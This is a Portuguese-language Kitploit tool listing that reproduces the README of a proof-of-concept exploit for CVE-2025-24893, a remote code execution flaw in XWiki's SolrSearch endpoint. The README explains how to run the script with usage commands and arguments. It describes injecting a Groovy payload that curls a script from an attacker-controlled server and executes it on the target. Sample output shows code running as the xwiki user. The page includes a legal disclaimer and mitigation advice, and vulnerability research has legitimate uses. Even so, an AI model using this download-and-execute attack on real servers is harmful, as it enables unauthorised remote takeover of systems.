Skip to content
KitploitKITPLOIT
FerramentasBlog
Log in
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/570rmbr3ak3r/xwiki-cve-2025-24893-poc
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebAprendizado e EducaçãoFerramenta de Acesso Remoto
GitHub570rmbr3ak3r/xwiki-cve-2025-24893-poc

xwiki-cve-2025-24893-poc

PoC para CVE-2025-24893

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
3111há 1 anoAinda não revisado
Compartilhar

PoC de Exploração de RCE no XWiki (CVE-2025-24893)

Visão Geral

Este repositório contém um exploit de Prova de Conceito (PoC) para a vulnerabilidade de Execução Remota de Código (RCE) no XWiki identificada como CVE-2025-24893. A vulnerabilidade permite que um atacante execute código arbitrário em uma instância XWiki alvo ao enviar uma requisição maliciosa para o endpoint SolrSearch. Este script suporta destinos HTTP e HTTPS.

⚠️ Aviso: Este PoC é destinado apenas para fins educacionais e de pesquisa. O uso não autorizado deste código contra sistemas sem permissão explícita é ilegal e antiético. Sempre obtenha autorização adequada antes de testar qualquer sistema.

Detalhes da Vulnerabilidade

  • CVE ID: CVE-2025-24893
  • Componente Afetado: endpoint SolrSearch do XWiki
  • Impacto: Execução Remota de Código (RCE)
  • Aviso: Aviso de Segurança do GitHub

A vulnerabilidade surge devido ao tratamento inadequado da entrada do usuário no endpoint SolrSearch, permitindo a injeção de código Groovy através de um payload malicioso. Este PoC demonstra como um atacante pode explorar isso para executar comandos arbitrários no servidor alvo.

Pré-requisitos

  • Python 3.x
  • Bibliotecas Python necessárias: requests, argparse, urllib.parse, re, html
  • Uma instância XWiki alvo vulnerável ao CVE-2025-24893
  • Um servidor controlado pelo atacante para hospedar o script bash, acessível via HTTP ou HTTPS
  • Um arquivo contendo o código a ser executado no alvo

Instalação

  1. Clone este repositório:
    git clone https://github.com/570RMBR3AK3R/xwiki-cve-2025-24893-poc.git
    
  2. Instale as bibliotecas Python necessárias:
    pip install requests
    

Uso

O script envia uma requisição HTTP/HTTPS maliciosa para a instância XWiki alvo, injetando um payload Groovy que executa um comando curl para buscar e executar um arquivo de um servidor controlado pelo atacante.

Execute o script com o seguinte comando:

python3 exploit.py --url <target_url> --server <attacker_server> --file <malicious_file> [--no-verify]

Argumentos

  • --url: A URL base da instância XWiki alvo (ex.: http://target ou https://target).
  • --server: O IP ou hostname do servidor do atacante, incluindo a porta se necessário (ex.: 192.168.1.100:8080). Suporta HTTP e HTTPS.
  • --file: O nome do arquivo no servidor do atacante contendo o código a ser executado (ex.: exploit.sh).
  • --no-verify: Flag opcional para desabilitar a verificação SSL para destinos HTTPS (use com cautela, apenas para testes).

Exemplo

python3 exploit.py --url http(s)://vulnerable-xwiki.com --server http(s)://192.168.1.100:8080 --file exploit.sh

Para ignorar a verificação SSL (ex.: para certificados auto-assinados):

python3 exploit.py --url https://vulnerable-xwiki.com --server http(s)://192.168.1.100:8080 --file exploit.sh --no-verify

Isso irá:

  1. Constrói um payload que usa o script Groovy para executar um comando curl.
  2. Busca o arquivo especificado (exploit.sh) do servidor do atacante (http(s)://192.168.1.100:8080).
  3. Executa o arquivo baixado no sistema alvo.
  4. Extrai e exibe a saída, limpando quaisquer tags e entidades HTML.

Saída

O script extrai a resposta do alvo, remove tags HTML (ex.: <br/>, <del>), e converte entidades HTML para texto simples para legibilidade. A saída limpa é exibida no console.

Exemplo

python3 exploit.py --url http://<redacted> --server http://<redacted>:8080 --file exploit.sh 
uid=997(xwiki) gid=997(xwiki) groups=997(xwiki)

Limitações

  • A instância XWiki alvo deve ser vulnerável ao CVE-2025-24893.
  • O servidor do atacante deve estar acessível a partir do sistema alvo via HTTP ou HTTPS.
  • O script assume que o servidor alvo suporta o endpoint SolrSearch e a execução de Groovy.

Mitigação

  • Atualize o XWiki para a versão corrigida mais recente.
  • Consulte o Aviso de Segurança do GitHub para etapas detalhadas de mitigação.
  • Blog de referência CVE-2025-24893

Licença

Este projeto está licenciado sob a Licença MIT. Consulte o arquivo LICENSE para obter detalhes.

Baixar ferramenta